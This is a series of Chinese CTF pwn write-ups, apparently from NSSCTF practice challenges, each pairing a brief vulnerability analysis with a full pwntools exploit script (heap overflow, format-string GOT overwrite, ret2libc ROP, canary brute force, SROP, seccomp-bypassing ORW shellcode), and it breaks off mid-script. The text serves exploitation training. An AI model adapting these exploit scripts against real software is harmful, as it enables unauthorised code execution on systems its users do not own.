[HNCTF 2022 WEEK4]ezheap
64位保护全开
一道堆题,四种功能齐全。
add中会malloc两个堆块,一个0x20,一个自定义。
将puts函数的真实地址放在了自定义堆块的prev size处。
存在堆溢出漏洞。
delete时不会将自动申请的堆块free掉。
show函数非常关键,它将prev size处的数据作为函数指针使用,将prev size+0x10处的数据作为参数,而prevsize处存放了puts函数。
所以我们可以通过堆溢出修改prev size+0x10为puts函数地址,泄露libcbase,再修改puts函数为onegadget,从而getshell。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
#from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
#context(os='linux', arch='amd64', log_level='debug')
p=remote('node5.anna.nssctf.cn',20869)
#p = process('./ezheap')
elf = ELF('./ezheap')
libc = ELF('./glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
def add(idx, size, name = b'a', data = b'a'):
sla(b'Choice: \n', b'1')
sla(b'idx:\n', str(idx))
sla(b'Size:\n', str(size))
sa(b'Name: \n', name)
sa(b'Content:\n', data)
def free(idx):
sla(b'Choice: \n', b'2')
sla(b'idx:\n', str(idx))
def show(idx):
sla(b'Choice: \n', b'3')
sla(b'idx:\n', str(idx))
def edit(idx, size, data):
sla(b'Choice: \n', b'4')
sla(b'idx:\n', str(idx))
sla(b'Size:\n', str(size))
s(data)
#gdb.attach(p)
add(0,0x10)
add(1,0x20)
payload=p64(0)*3+p64(0x31)+p64(0)*2+p8(0x30)
edit(0,0x31,payload)
show(1)
libc_base=l64()-libc.sym['puts']
print(hex(libc_base))
one_gadget = 0x45226 + libc_base
payload1=p64(0)*3+p64(0x31)+p64(0)*4+p64(one_gadget)
edit(0,0x50,payload1)
show(1)
inter()
[CISCN 2019西南]PWN1
32位开启了NX保护。
存在明显的格式化字符串漏洞。
同时已给出system函数。
所以我们利用格式化字符串将printfgot改为system函数,将fini_array改为main函数,即可获得shell
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
#from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
#context(os='linux', arch='i386', log_level='debug')
#p=remote('node5.anna.nssctf.cn',20869)
p = process('[CISCN 2019西南]PWN1')
elf = ELF('[CISCN 2019西南]PWN1')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
gdb.attach(p, 'b *0x80485AD')
p.recvuntil(b"Welcome to my ctf! What's your name?\n")
fini_array=0x0804979C
system_addr=elf.plt['system']
printf_got=elf.got['printf']
main=elf.symbols['main']
payload = b'%2052c%13$hn%31692c%14$hn%356c%15$hn' + p32(printf_got + 2) + p32(printf_got) + p32(fini_array)
p.sendline(payload)
p.recvuntil(b"Welcome to my ctf! What's your name?\n")
p.sendline(b'/bin/sh\x00')
p.interactive()
[UUCTF 2022 新生赛]easystack
64位开启了NX和pie。
存在栈溢出,但可溢出空间较小。
存在backdoor,所以我们需要返回到backdoor。
由于溢出长度不够,所以我们需要通过爆破来实现。
exp
from pwn import *
while 1:
io = remote('1.14.71.254', 28097)
payload = b'A'*(0x100+8) + p64(0x00001185)
io.sendline(payload)
if b"You are" in io.recv():
io.interactive()
io.close()
[NSSRound#4 SWPU]真签到题来试试吧
64位,普通的ret1libc。
exp
from pwn import *
from LibcSearcher import *
#context(os = 'linux', arch = 'amd64', log_level='debug')
#io=process('pwn4')
io=remote('node4.anna.nssctf.cn',28034)
elf=ELF('pwn (2)')
ret=0x40101a
rdi=0x401373
main=0x40121b
rsi_r15=0x4007d1
#payload1=b'a'*(0x28)+p64(rdi)+p64(1)+p64(rsi_r15)+p64(elf.got['read'])+p64(1)+p64(elf.plt['write'])+p64(ret)+p64(main)
payload1=b'a'*(0x88)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main)
io.sendline(payload1)
puts_ad=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc=LibcSearcher('puts',puts_ad)
'''
base=read_ad-libc.sym['read']
print(hex(base))
sys=base+libc.sym['system']
sh=base+next(libc.search(b'/bin/sh'))
'''
libc = LibcSearcher('puts',puts_ad)
libc_base = puts_ad - libc.dump('puts')
sys= libc_base + libc.dump('system')
sh = libc_base + libc.dump('str_bin_sh')
payload2=b'a'*(0x88)+p64(ret)+p64(rdi)+p64(sh)+p64(sys)
io.sendline(payload2)
io.interactive()
[CISCN 2023 初赛]funcanary
64位保护全开。
使用fork()函数开启了子进程,所以我们可以使用爆破的方式泄露canary,爆破过程漫长,耐心等待,我不小心又开了一道题,然后这个靶机自动关了,又要重新来,哭死。
存在后门函数,但是由pie的存在,我们只传入后三位,多进行几次,就可以返回成功。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
#from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
context(os='linux', arch='amd64', log_level='debug')
p=remote('node5.anna.nssctf.cn',22915)
#p = process('service')
elf = ELF('service')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p.recvuntil('welcome\n')
canary = b'\x00'
for k in range(7):
for i in range(256):
payload = b'a' * 0x68 + canary + bytes([i])
p.send(payload)
data = p.recvuntil("welcome\n")
print(data)
if b"fun" in data:
canary += bytes([i])
print("canary is:" + str(canary))
break
back_door = 0x231
for i in range(15):
num=i<<12
payload = b'a' * 0x68 + p64(u64(canary)) + b'a' * 8 + p16(0x231+num)
p.send(payload)
flag=p.recv()
if b"NSSCTF" in flag:
print(str(flag))
break
p.interactive()
[HGAME 2023 week1]simple_shellcode
64位保护全开。
mmap开辟了一段可读可写可执行空间,开启了沙盒保护
根据题目的提示,我们可知,需要利用read写一段shellcode,再次调用read读入足够大的数据来进行orw。
exp
from pwn import *
context(log_level='debug',arch='amd64', os='linux')
#p=process('./vuln')
p=remote('node5.anna.nssctf.cn',26392)
shellcode1=asm('''
mov rdi,rax;
mov rsi,0xCAFE0010;
syscall;
nop;
''')
p.sendafter("Please input your shellcode:\n",shellcode1)
shellcode2= asm('''
push 0x67616c66
mov rdi,rsp
xor esi,esi
push 2
pop rax
syscall
mov rdi,rax
mov rsi,rsp
mov edx,0x100
xor eax,eax
syscall
mov edi,1
mov rsi,rsp
push 1
pop rax
syscall
''')
orw=b'\xb8flagPH\x89\xe71\xf61\xc0\x04\x02\x0f\x05\x89\xc7H\x89\xe6f\xb8\x01\x011\xd2f\x89\xc2f\x01\xc61\xc0\x0f\x051\xfff\xff\xc7f\xff\xc71\xc0\xfe\xc0\x0f\x05'
p.send(orw)
p.interactive()
[CISCN 2019华南]PWN3
64位,NX保护。
存在栈溢出与系统调用,还有mov rax,0xf的gadget,说明是srop 。
先通过write函数泄露栈地址,再返回到vuln再次执行srop。
exp
from pwn import *
context(log_level='debug',arch='amd64', os='linux')
io = remote('node5.anna.nssctf.cn',23535)
syscall = 0x400517
gadget = 0x4004DA
vuln = 0x4004ED
# gdb.attach(io,"b *main")
io.send(b"a"*0x10+p64(vuln))
io.recv(0x20)
# print()
stack = u64(io.recv(6).ljust(8,b'\x00')) -0x118
print("stack -> " + hex(stack))
frame = SigreturnFrame()
frame.rax = 59
frame.rdi = stack
frame.rip = syscall
frame.rsi = 0
payload = b"/bin/sh\x00"*0x2 + p64(gadget) + p64(syscall) + bytes(frame)
io.send(payload)
io.interactive()
[广东省大学生攻防大赛 2022]jmp_rsp
64位保护全关。checksec说有canary但实际上没有。
静态编译还存在栈溢出 。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
#from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
context(os='linux', arch='amd64', log_level='debug')
p=remote('node4.anna.nssctf.cn',28244)
#p = process('./service')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./service')
jmp_rsp = 0x46d01d
payload = asm(shellcraft.sh()).ljust(0x88, b'\x00') + p64(jmp_rsp) + asm('sub rsp, 0x90; jmp rsp')
s(payload)
inter()
[FSCTF 2023]rdi
存在栈溢出
给出了system函数。
可以找到sh字符串。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
#from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
context(os='linux', arch='amd64', log_level='debug')
p=remote('node4.anna.nssctf.cn',28533)
#p = process('./rdi')
rdi=0x04007d3
sys=0x04006FB
sh=0x040080d
payload=b'a'*0x88+p64(rdi)+p64(sh)+p64(sys)
s(payload)
[HNCTF 2022 WEEK2]ret2libc
64位NX保护,存在栈溢出,普通的ret2libc。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
context(os='linux', arch='amd64', log_level='debug')
#p = process('./ret2libc')
p = remote('node5.anna.nssctf.cn',23762)
elf = ELF('./ret2libc')
#libc = ELF('./libc-database/db/libc6_2.27-3ubuntu1.5_amd64.so')
libc = ELF('./glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc-2.31.so')
rdi = 0x0000000000401273
ret = 0x000000000040101a
vuln = elf.sym['vuln']
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
payload = b'a'*0x108 + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)
p.sendline(payload)
puts_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
l = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - l.dump("puts")
system = libc_base + l.dump("system")
str_bin_sh = libc_base + l.dump("str_bin_sh")
payload = b'a'*0x108 + p64(ret) + p64(rdi) + p64(str_bin_sh) + p64(system)
p.sendline(payload)
p.interactive()
[HNCTF 2022 WEEK2]arrayRE
64位保护全开
但并不需要去绕过这些保护,
只需要输入正确的密码就可以获得shell。
将831654239123423452610584解密。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
context(os='linux', arch='amd64', log_level='debug')
#p = process('./ret2libc')
p = remote('node5.anna.nssctf.cn',24906)
elf = ELF('./arrayRE')
#libc = ELF('./libc-database/db/libc6_2.27-3ubuntu1.5_amd64.so')
libc = ELF('./glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc-2.31.so')
passwrd = "831654239123423452610584"
answer = ""
length = len(passwrd)
for i in range(len(passwrd) - 1):
cur = length - i - 1
pre = cur - 1
ans = ord(passwrd[cur]) - 48
a1 = ord(passwrd[pre])
a2 = a1 + pre
num = (35 * (a1 - 48) + 18 * (a2 - 48) + 2) % 10
num = (num + 3) % 10
v3 = (ans - num) % 10
answer += chr(v3 + 48)
answer = "8" + answer[::-1]
p.recvuntil(b'name:')
p.send(b'hahaha')
p.recvuntil(b'password:')
p.send(answer)
p.interactive()
[HGAME 2023 week1]choose_the_seat
64位NX保护。
存在整数溢出和数组越界。
将exit的got改为vuln函数,然后泄露puts函数的got,获得libc_base,然后将puts改为system。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
context(os='linux', arch='amd64', log_level='debug')
#p=process('./vuln')
p = remote('node5.anna.nssctf.cn',20788)
elf = ELF('./vuln')
libc = ELF('libc-2.31.so')
#gdb.attach(p)
sla(b'please choose one.\n',b'-6')
sla(b'your name\n',p64(elf.sym['main']))
#pause()
sla(b'please choose one.\n',b'-9')
r()
s(b'a'*0x8)
libc_base=l64()-libc.sym['puts']
sys=libc_base+libc.sym['system']
#pause()
sla(b'please choose one.\n',b'-9')
sla(b'your name\n',b'/bin/sh\x00'+p64(sys))
inter()
[CISCN 2019华南]PWN4
32位NX保护。
栈溢出只能覆盖到ret,明显的栈迁移。
泄露栈地址
在原栈上构造rop链,进行栈迁移。
已经给出了system函数,不需要泄露libcbase。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('[CISCN 2019华南]PWN4')
p = remote('node5.anna.nssctf.cn',25642)
elf = ELF('[CISCN 2019华南]PWN4')
libc = ELF('libc-2.31.so')
leave = 0x80485FD
ret = 0x80485FE
sa(b'your name?\n',b'a'*(0x28))
rl(b'a'*(0x28))
ebp=u32(r(4))
stack=ebp-0x38
payload=(b'aaaa'+p32(elf.sym['system'])+p32(0)+p32(ebp-0x28)+b'/bin/sh\x00').ljust(0x28,b'\x00')+p32(stack)+p32(leave)
r()
s(payload)
inter()
[SWPUCTF 2023 秋季新生赛]签到
64位NX保护
真的是ret2text。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('[CISCN 2019华南]PWN4')
p = remote('node4.anna.nssctf.cn',28910)
#elf = ELF('[CISCN 2019华南]PWN4')
libc = ELF('libc-2.31.so')
backdoor=0x401232
payload=b'a'*(0x38)+p64(0x40101a)+p64(backdoor)
s(payload)
inter()
[NSSRound#9 Basic]MyExec
64位保护全开
用mmap函数开辟了一段可读可写可执行的地址,并read数据。
开启了沙盒保护。禁用了系统调用
使用orw。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
p=process('service')
p = remote('node5.anna.nssctf.cn',28618)
elf = ELF('service')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
sla(b'andbox\n', asm(shellcraft.open('/home/ctf/flag.txt') + shellcraft.read(3, 0x50000 + 0x200, 0x30) + shellcraft.write(1, 0x50000 + 0x200, 0x30)))
inter()
[watevrCTF 2019]Voting Machine 2
32位NX保护。
存在格式化字符串漏洞。
存在后门函数。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
context(os='linux', arch='i386', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
#p=process('service')
p = remote('node5.anna.nssctf.cn',20729)
elf = ELF('[watevrCTF 2019]Voting Machine 2')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
flag_addr= elf.sym['super_secret_function']
exit_addr = elf.got['exit']
payload = b'a'*2+fmtstr_payload(8, {exit_addr:flag_addr},numbwritten=2)
s(payload)
inter()
[MoeCTF 2021]ezROP
64位NX保护
普通的ret2libc,但是需要在payload前加\x00绕过strlen函数检测。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
context(os='linux', arch='i386', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
#p=process('service')
p = remote('node5.anna.nssctf.cn',24747)
elf = ELF('pwn (2)')
libc = ELF('./glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
ret = 0x4006b9
rdi = 0x400c83
sla(b'choice!\n', b'1')
sla(b'encrypted\n', b'\x00'*0x58 + p64(rdi) + p64(elf.got['puts']) + p64(elf.sym['puts']) + p64(elf.sym['main']))
libc_base = l64() - libc.sym['puts']
system, binsh = get_sb()
sla(b'choice!\n', b'1')
sla(b'encrypted\n', b'\x00'*0x58 + p64(ret) + p64(rdi) + p64(binsh) + p64(system))
inter()
[NSSRound#9 Basic]old fashion
我们需要通过获得伪随机数来进入yay获得shell。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('service')
p = remote('node5.anna.nssctf.cn',26679)
elf = ELF('zzzzz')
libc = ELF('./glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc.so.6')
libc = cdll.LoadLibrary('./glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc.so.6')
libc.srand(libc.time(0))
sla(b'100): ', str((libc.rand() % 100) + 1))
inter()
[GDOUCTF 2023]小学数学
需要写三百道计算题,有实力的大佬可以考虑自己算,这里我们选择了写个脚本
exp
def tt(a, b, c):
if b == b'//':
return str(a * c)
elif b == b'-':
return str(a + c)
elif b == b'x':
return str(a - c)
elif b == b'%':
return str(a // c)
else:
return str(a % c)
sl('')
for i in range(300):
rl(b'Round: ' + str(i+1).encode() + b'\n')
a = int(rl(b' ')[:-1])
b = rl(b' ')[:-1]
c = int(rl(b' ')[:-1])
sl(tt(a, b, c))
pr()
pr()
pr()
[HUBUCTF 2022 新生赛]ez_pwn
64位保护全开。
也是需要使用伪随机数种子生成随机数,获得flag。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
